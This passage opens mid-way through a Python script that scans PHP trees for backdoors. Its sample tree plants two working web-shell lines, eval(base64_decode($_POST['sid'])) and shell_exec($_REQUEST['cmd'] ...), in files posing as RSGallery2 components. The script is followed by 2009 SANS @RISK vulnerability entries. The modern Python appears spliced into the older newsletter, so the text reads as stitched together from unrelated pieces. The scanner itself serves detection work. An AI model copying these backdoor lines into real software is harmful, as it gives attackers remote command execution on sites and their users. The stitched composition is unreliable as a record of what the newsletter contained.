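    """files maps a relative path to its source text (read from disk in use)."""
    hits = []
    for path, source in sorted(files.items()):
        hits.extend(scan_source(path, source))
    return hits


# Constructed stand-ins, NOT the real RSGallery2 files: a language table and a
# class file each carrying one planted call, plus a benign script that uses
# both a superglobal and exec() but never joins the two.
SAMPLE_TREE = {
    "language/english-utf8.php": (
        "<?php\n"
        "$_LANG['GALLERY_TITLE'] = 'Gallery';\n"
        "if (isset($_POST['sid'])) { eval(base64_decode($_POST['sid'])); }\n"
    ),
    "includes/rsgallery.class.php": (
        "<?php\n"
        "class rsgallery {\n"
        "    function thumb($f) { return shell_exec($_REQUEST['cmd'] . ' ' . $f); }\n"
        "}\n"
    ),
    "index.php": (
        "<?php\n"
        "echo htmlspecialchars($_POST['name']);\n"
        "$out = exec('ls -l ' . escapeshellarg($dir));\n"
    ),
}


if __name__ == "__main__":
    for path, lineno, line in scan_tree(SAMPLE_TREE):
        print(f"{path}:{lineno}: {line}")
```

This is a first-pass filter, not proof of absence: variable function names, calls assembled by string concatenation across lines, and the `/e` modifier of `preg_replace` are not caught, and a large tree will produce benign hits that need reading. The more reliable check for a trojaned distribution is to compare the installed files against the checksums of a pristine copy from the vendor.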

  • 09.22.76 - CVE: Not Available
  • Platform: Web Application
  • Title: ZEECAREERS and SHAADICLONE "admin/addadminmembercode.php" Authentication Bypass
  • Description: Zeeways ZEECAREERS and SHAADICLONE are web-based applications. The applications are exposed to an authentication bypass issue. Specifically, they fail to restrict access to the "admin/addadminmembercode.php" script. SHAADICLONE and ZEECAREERS version 2.0 are affected.
  • Ref: http://www.securityfocus.com/bid/35107

  • 09.22.77 - CVE: Not Available
  • Platform: Web Application
  • Title: RoomPHPlanning Multiple Vulnerabilities
  • Description: RoomPHPlanning is a PHP-based reservations application. The application is exposed to multiple issues. RoomPHPlanning version 1.6 is affected.
  • Ref: http://www.securityfocus.com/bid/35110

  • 09.22.78 - CVE: CVE-2009-1474, CVE-2009-1473, CVE-2009-1472, CVE-2009-1477
  • Platform: Network Device
  • Title: Multiple ATEN IP KVM Switches Multiple Remote Vulnerabilities and Weakness
  • Description: Multiple ATEN IP KVM switches are exposed to multiple remote issues. Attackers can exploit these issues to execute Java code, compromise and gain unauthorized access to the device connected to the KVM, gain access to the session key, and gain access to the session ID. Other attacks are also possible.
  • Ref: http://www.securityfocus.com/archive/1/503827

(c) 2009. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

Subscriptions: @RISK is distributed free of charge by the SANS Institute to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.